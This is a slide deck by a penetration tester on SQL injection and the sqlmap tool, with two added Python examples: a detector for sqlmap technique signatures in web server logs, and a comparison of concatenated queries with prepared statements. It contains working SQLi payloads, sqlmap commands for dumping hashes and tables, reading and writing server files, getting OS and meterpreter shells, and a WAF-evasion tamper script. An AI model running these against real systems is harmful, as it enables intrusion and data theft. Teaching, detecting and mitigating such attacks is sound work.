This document discusses SQL injection and the sqlmap tool. It provides an overview of SQL injection, describes how sqlmap can be used to find and exploit SQL injection vulnerabilities, and demonstrates how it can be used to enumerate databases and file systems, and in some cases obtain remote access. It also discusses mitigation techniques such as input sanitization and prepared statements.
SQL injection with sqlmap
Herman Duarte <hcoduarte@gmail.com>
Tuesday, December 4, 12 1
About me
Consultant @ INTEGRITY S.A. - www.integrity.pt
Penetration testing engagements
BSc in Information Systems and Computer Engineering
CISSP Associate / ISO27001LA / CCNA
Security addict :)
SQLi 101: Definition
Definition:
SQL injection occurs when it is possible to inject SQL commands in data-plane input in order to affect the execution of predefined SQL statements.
It affects any application that uses non-sanitized user-supplied input in dynamic SQL query construction (e.g. web apps, fat clients).
Cause:
Bad programming practices + lack of knowledge/awareness
SQLi 101: Structure
...?name=robert' union all select null,@@version,null #
Prefix: ' (closes the original string literal) | Payload: union all select null,@@version,null | Suffix: # (comments out the rest of the original query)
$query = "SELECT name,status,age FROM user WHERE name='" . $_REQUEST['search'] . "' AND age > 42";
sqlmap
Developed in python
Prerequisites to run sqlmap:
Python 2.6.x or 2.7.x
To install:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap
To update:
python sqlmap.py --update
git pull
sqlmap
Mainly developed by:
Bernardo Damele A.G. (@inquisb)
Miroslav Stampar (@stamparm)
sqlmap: Scenarios
Find and exploit SQL injection in web applications
Direct connection (database account is needed)
DBMS python binding installed (e.g. PyMySQL)
-d <dbms>://<user>:<password>@<ip>:<port>/<db_name>
sqlmap: Workflow
Select your target
Identify possible injection points
Identify SQLi vulnerabilities:
By using sqlmap
Manual testing :)
Exploit SQLi vulnerabilities:
Enumerate
File system access
OS pwnage
Own the internal network (w00t! w00t!)
sqlmap: Injection points
GET parameters
POST parameters
Cookie header values (only if --level >= 2)
User-Agent header value (only if --level >= 3)
Referer header value (only if --level >= 3)
sqlmap: Finding SQLi (I)
./sqlmap.py -u "https://webapp.com/news.php?id=1"
or
./sqlmap.py -r news_get_request --force-ssl
Default behavior:
Tests all GET and/or POST parameters, for all SQLi types, for all databases (if the DBMS is not discovered during the tests).
Yes, it may take a long time, and it still doesn't cover all the tests sqlmap can do.
sqlmap: Finding SQLi (II)
--level=<level> (1...5 - default is 1)
With --level=5 every combination of payload, prefix and suffix will be tested on all available injection points (noisier, but gives more coverage).
--risk=<risk> (0...3 - default is 1)
Tests that use OR-based payloads require --risk=3. Why? Imagine this:
UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1#
-p <param to test>[,<param to test>] (test only the listed parameters)
sqlmap: SQLi techniques/types
--technique=SU (default is all of them: BEUST)
Boolean-based blind
Based on page changes, data is inferred, char by char
Error-based
Uses the errors that are displayed to extract data
Union query-based
Changes the SQL queries to extract data
Stacked queries
Semicolons are used to inject multiple statements into the SQL query
Time-based blind
Based on time, data is inferred, char by char
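The five technique types above are also what a defender sees in the web server logs when a scanner works through them. As an added example (not from the slides and not sqlmap's own code), the Python script below parses constructed Apache combined-format access-log lines, URL-decodes each request, flags which of the B/E/U/S/T techniques the request resembles, and aggregates the findings per client IP. The log lines, IP addresses, timestamps and User-Agent strings are constructed for the example, and the regular expressions are illustrative detection signatures, not sqlmap's payload list.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format) for this example only.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Dec/2012:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Dec/2012:10:00:02 +0000] "GET /news.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Dec/2012:10:00:03 +0000] "GET /news.php?id=1%20AND%20EXTRACTVALUE(1%2Cversion()) HTTP/1.1" 500 233 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Dec/2012:10:00:04 +0000] "GET /news.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL-- HTTP/1.1" 200 611 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '10.0.0.9 - - [04/Dec/2012:10:00:05 +0000] "GET /news.php?id=1%3BSELECT%20pg_sleep(5)-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Dec/2012:10:00:06 +0000] "GET /news.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Illustrative signatures keyed by the letters sqlmap uses for --technique (BEUST).
TECHNIQUE_PATTERNS = {
    "B": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),                       # boolean-based blind
    "E": re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML|CONVERT|CAST)\s*\(", re.I),      # error-based
    "U": re.compile(r"\bUNION\b.*?\bSELECT\b", re.I),                             # union query-based
    "S": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP|EXEC|WAITFOR)\b", re.I),  # stacked queries
    "T": re.compile(r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I),  # time-based blind
}


def parse_line(line):
    """Split one combined-format line into fields; returns None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Scanners URL-encode payloads; decode twice to also catch double-encoded input.
    rec["decoded"] = unquote_plus(unquote_plus(rec["path"]))
    return rec


def classify(decoded_request):
    """Return the technique letters (in BEUST order) whose signature matches."""
    return "".join(letter for letter, rx in TECHNIQUE_PATTERNS.items() if rx.search(decoded_request))


def classify_line(line):
    """(client ip, technique letters, True if the User-Agent names the tool) or None."""
    rec = parse_line(line)
    if rec is None:
        return None
    return rec["ip"], classify(rec["decoded"]), "sqlmap" in rec["ua"].lower()


def summarize(lines):
    """Aggregate suspicious requests per client IP; clean requests are dropped."""
    report = {}
    for line in lines:
        result = classify_line(line)
        if result is None:
            continue
        ip, techniques, tool_ua = result
        if not techniques and not tool_ua:
            continue
        entry = report.setdefault(ip, {"requests": 0, "techniques": set(), "tool_ua": False})
        entry["requests"] += 1
        entry["techniques"].update(techniques)
        entry["tool_ua"] = entry["tool_ua"] or tool_ua
    return report


if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry["requests"], "".join(sorted(entry["techniques"])), entry["tool_ua"])
```

One client working through several technique types against the same parameter in a short window is the pattern to alert on; a single boolean probe on its own is far less conclusive, and a default User-Agent is only a bonus signal since it is trivially changed.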
sqlmap: Supported DBMSs
--dbms=mssql | mysql | postgresql | oracle ...
Microsoft SQL Server
MySQL
PostgreSQL
Oracle
IBM DB2
SAP MaxDB
Sybase
Firebird
SQLite
Microsoft Access
sqlmap: Logging / Verbosity
Log all HTTP traffic to a text file: -t <output file>
Save the options used on the command line: --save <file>
Verbosity:
-v <0..6> (default 1)
-v 6: same as -t, but the output goes to the console
sqlmap: Enumeration (I)
Objective:
Get data from the DBMS tables (limited by the privileges the current DBMS user has)
What can you get:
DBMS exact version, O.S. information, architecture and patch level: -f
DBMS banner: -b
DBMS server hostname: --hostname
DBMS user the application is using: --current-user
Applications current DB: --current-db
If the current user is a DBA: --is-dba
sqlmap: Enumeration (II)
What can you get:
...
List the DBMS users: --users
List all DBMS users' password hashes: --passwords
sqlmap will automatically try to crack the hashes with a dictionary attack
List users' privileges: --privileges
List all available databases: --dbs
List all tables, or just those of a specific database:
--tables (-D <database name>)
sqlmap: Enumeration (III)
What can you get:
...
List all columns or just for a specific table from that database:
--columns (-T <table name> -D <db name>)
Count table entries: --count
Dump data from a database/table/column:
--dump (-D, -T, -C can be used to select what data to dump)
--dump-all (I don't recommend it)
Search for a whole or partial database name, table name or column name:
--search (-D, -T, -C to specify what to search for)
sqlmap: Enumeration (IV)
What can you get:
...
Execute a custom SQL query:
--sql-query="<sql query to execute>"
Interactive SQL shell to execute all your custom SQL queries:
--sql-shell
sqlmap: File system access
Objective:
Read and write any textual or binary file from the DBMS O.S.
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
Read:
--file-read="<file path>"
Write:
--file-write="<file local path>"
--file-dest="<remote file location path>"
sqlmap: OS pwnage (I)
Objective:
Get access to the DBMS O.S. and the internal network (if the DBMS server is in the internal network)
Prerequisites:
DBMS = mssql | mysql | postgresql
Current DBMS user must have the necessary privileges
What can you do?
Get a reverse shell if the DB can:
connect to the internet
ping your server (yes an icmp shell :))
Establish a VNC connection
sqlmap: OS pwnage (II)
To execute an OS command:
--os-cmd="<command to execute>"
To get an OS shell: --os-shell
To get a meterpreter shell, an icmpshell or VNC:
--os-pwn
--msf-path="<msf path>"
Stored procedure privilege escalation (buffer overflow):
--bof
sqlmap: Tamper scripts
Tamper scripts alter the payload before it is sent:
--tamper <script file path>[,<script file path>]
Example: tamper/bluecoat.py
    import re

    def tamper(payload, headers=None):
        """
        Example:
            * Input: SELECT id FROM users where id = 1
            * Output: SELECT%09id FROM users where id LIKE 1
        Requirement:
            * MySQL, Blue Coat SGOS with WAF activated as documented in
              https://kb.bluecoat.com/index?page=content&id=FAQ2147
        """
        retVal = payload
        if payload:
            # swap the whitespace after SELECT/UPDATE/INSERT/DELETE for a tab (%09 once URL-encoded)
            retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
            # replace "=" comparisons with LIKE
            retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
        return retVal
sqlmap: Tips
If HTTPS is being used, don't forget to set: --force-ssl
Get as much information as you can before you start looking for SQLi vulnerabilities. It will save you time.
Union-based gives more data with fewer requests; use it.
Time-based blind SQLi is faster to check than union-based queries in cases where a lot of columns are used.
If --is-dba returns true and --technique=S works, you can start to gangnam style
Mitigation Techniques
Sanitize input
Use prepared statements / bind variables
Configure DBMS users with the least-privilege principle in mind
Use generic error messages; don't pass DBMS errors to the user
In case the web application source code can't be changed, a proxy can be used between the web server and the database server (e.g. GreenSQL)
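To make the first two mitigations concrete, here is an added Python example (not from the slides). It rebuilds the query from the SQLi 101: Structure slide and the UPDATE from the --risk slide in SQLite, using sqlite_version() and a `--` comment suffix where the slides use MySQL's @@version and `#`, and runs each both as the vulnerable string concatenation and as a prepared statement. The table contents and payload strings are constructed for the example; the point is that with bind variables the very same input is treated as a value and never changes the statement's structure.

```python
import sqlite3

# Constructed sample rows for the example's 'user' table (not from the slides).
SAMPLE_USERS = [("robert", "active", 45), ("alice", "active", 30), ("bob", "active", 50)]

# SQLite counterparts of the slides' payloads: sqlite_version() instead of MySQL's
# @@version, and '--' as the comment suffix instead of '#'.
UNION_PAYLOAD = "robert' union all select null,sqlite_version(),null --"
OR_PAYLOAD = "nobody' OR 1=1 --"


def make_db():
    """Fresh in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, status TEXT, age INTEGER)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def search_vulnerable(conn, search):
    """The slide's PHP pattern: untrusted input concatenated into the SQL text."""
    query = "SELECT name,status,age FROM user WHERE name='" + search + "' AND age > 42"
    return conn.execute(query).fetchall()


def search_safe(conn, search):
    """Same query as a prepared statement; the value travels separately from the SQL."""
    query = "SELECT name,status,age FROM user WHERE name=? AND age > 42"
    return conn.execute(query, (search,)).fetchall()


def disable_vulnerable(conn, name):
    """The --risk slide's UPDATE, concatenated. Returns the number of rows changed."""
    cur = conn.execute("UPDATE user SET status='disabled' WHERE name='" + name + "'")
    conn.commit()
    return cur.rowcount


def disable_safe(conn, name):
    """The same UPDATE with a bind variable. Returns the number of rows changed."""
    cur = conn.execute("UPDATE user SET status='disabled' WHERE name=?", (name,))
    conn.commit()
    return cur.rowcount


def demo():
    """Run both forms of both statements and collect the results for comparison."""
    results = {"library_version": sqlite3.sqlite_version}
    conn = make_db()
    # Vulnerable: the UNION payload appends a second row carrying the DBMS version.
    results["vuln_union"] = search_vulnerable(conn, UNION_PAYLOAD)
    # Safe: the payload is just a user name that does not exist, so no rows come back.
    results["safe_union"] = search_safe(conn, UNION_PAYLOAD)
    results["safe_plain"] = search_safe(conn, "robert")
    # Vulnerable: OR 1=1 turns a one-row UPDATE into an all-rows UPDATE.
    results["vuln_or_rows"] = disable_vulnerable(make_db(), OR_PAYLOAD)
    # Safe: nothing matches the literal name, so zero rows are changed.
    results["safe_or_rows"] = disable_safe(make_db(), OR_PAYLOAD)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Note that the prepared-statement versions do not sanitize anything: the quote character, the UNION and the OR 1=1 all reach the database unchanged, but only as the contents of a parameter. That is why the slides prefer bind variables over input filtering.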
Wrap-up
Input sanitization
Use prepared statements
Least-privilege principle is your friend (use it!)
Have I said to use prepared statements?! :)
Do code reviews
References
https://sqlmap.org
Advanced SQL injection to operating system full control - http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857
SQL Injection Attacks and Defenses - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240
Thank You!
Q&A
Herman Duarte
@hdontwit
https://www.linkedin.com/in/hcoduarte
hcoduarte@gmail.com